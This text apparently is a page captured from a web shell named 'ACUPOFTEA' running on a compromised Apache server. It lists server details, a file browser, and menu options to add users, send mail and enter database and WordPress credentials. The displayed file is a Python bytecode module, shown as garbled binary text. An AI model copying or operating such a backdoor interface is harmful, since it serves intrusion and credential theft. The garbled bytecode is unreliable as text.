System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
lib64
/
python3.6
/
__pycache__
/
216.73.216.5
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for accounting.gulfstore-gcc.com made by tabagkayu.
Folder Name
File Name
File Content
File
cgi.cpython-36.opt-1.pyc
3 Ow�hc� � @ s� d Z dZddlmZmZmZ ddlmZ ddlZddl Z ddl Zddlm Z ddlmZ ddlmZ ddlZddlZddlZd d ddd ddddddddddgZdadadd� Zdd� Zdd� Zdd � Zeadade jdddfd!d�Zd5d"d�Z d6d#d �Z!d$d� Z"d%d&� Z#d'd� Z$G d(d � d �Z%G d)d � d �Z&e jfd*d�Z'd7d+d�Z(e jfd,d�Z)d-d� Z*d.d� Z+d/d� Z,d0d� Z-d8d1d�Z.d2d3� Z/e0d4k�r�e'� dS )9z�Support module for CGI (Common Gateway Interface) scripts. This module defines a number of utilities for use by CGI scripts written in Python. z2.6� )�StringIO�BytesIO� TextIOWrapper)�MappingN)� FeedParser)�Message)�warn�MiniFieldStorage�FieldStorage�parse�parse_qs� parse_qsl�parse_multipart�parse_header�test�print_exception� print_environ� print_form�print_directory�print_arguments�print_environ_usage�escape� c G sH t r.t r.ytt d�aW n tk r, Y nX ts8tantat| � dS )a� Write a log message, if there is a log file. Even though this function is called initlog(), you should always use log(); log is a variable that is set either to initlog (initially), to dolog (once the log file has been opened), or to nolog (when logging is disabled). The first argument is a format string; the remaining arguments (if any) are arguments to the % operator, so e.g. log("%s: %s", "a", "b") will write "a: b" to the log file, followed by a newline. If the global logfp is not None, it should be a file object to which log data is written. If the global logfp is None, the global logfile may be a string giving a filename to open, in append mode. This file should be world writable!!! If the file can't be opened, logging is silently disabled (since there is no safe place where we could send an error message). �aN)�logfile�logfp�open�OSError�nolog�log�dolog)�allargs� r"